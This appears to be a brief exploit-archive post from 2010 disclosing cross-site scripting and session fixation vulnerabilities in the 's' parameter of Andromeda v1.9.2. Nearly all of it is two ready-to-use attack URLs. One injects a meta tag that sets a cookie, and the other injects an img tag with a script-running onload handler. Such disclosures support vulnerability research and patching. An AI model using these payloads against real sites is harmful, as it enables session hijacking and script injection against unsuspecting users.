Home / os / winme

Andromeda 's' Parameter Cross Site Scripting and S

Posted on 15 March 2010

================================================================================= Andromeda 's' Parameter Cross Site Scripting and Session Fixation Vulnerabilities ================================================================================= Exploit: http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'> http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<img+src=http://www.example.com/1.JPG+onload=alert(00213771818860)> # ~ - [ [ : Inj3ct0r : ] ]

 

TOP